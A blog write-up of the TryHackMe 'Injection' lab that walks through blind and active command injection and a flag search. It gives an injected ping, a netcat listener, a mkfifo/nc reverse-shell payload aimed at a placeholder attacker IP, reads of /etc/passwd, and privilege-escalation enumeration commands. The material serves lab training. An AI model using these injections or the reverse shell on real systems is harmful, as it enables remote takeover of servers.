TryHackMe: Injection

ratiros01
4 min readAug 4, 2020

--

[Task 3] Blind Command Injection

  1. Ping the box with 10 packets. What is this command (without IP address)?

Access the site

Prepare attacker machine to accept for ping command

tcpdump ip proto \\icmp -i tun0
; ping -c 10 <attacker ip> 

Back to attacker machine, success!!!

2. Redirect the box’s Linux Kernel Version to a file on the web server. What is the Linux Kernel Version?

I will get the reverse shell.

Prepare listener

nc -lvp 1234

Reverse shell reference:

; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1234 >/tmp/f

Paste the command and submit.

Back to listener, now I have a shell

uname -a

3. Enter “root” into the input and review the alert. What type of alert do you get?

4. Enter “www-data” into the input and review the alert. What type of alert do you get?

5. Enter your name into the input and review the alert. What type of alert do you get?

[Task 4] Active Command Injection

  1. What strange text file is in the website root directory?
ls
cat drpepper.txt

2. How many non-root/non-service/non-daemon users are there?

cat /etc/passwd

The answer is zero.

3. What user is this app running as?

whoami

4. What is the user’s shell set as?

from #2

5. What version of Ubuntu is running?

lsb_release -a

6. Print out the MOTD. What favorite beverage is shown?

cat /etc/update-motd.d/00-header

[Task 5] Get The Flag!

  1. Get the flag!

Import TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

Sudo

sudo -l

SUID

find / -perm -u=s -type f 2>/dev/null

Cronjob

cat /etc/crontab

Capabilities

getcap -r / 2>/dev/null

After all of these, I’m hitting the wall. Looking at hint may help

No privesc!!! Maybe there’re hidden flag.

find / 2>>/dev/null | grep -i "flag"

Lucky me!!!

cat /etc/flag.txt

--

--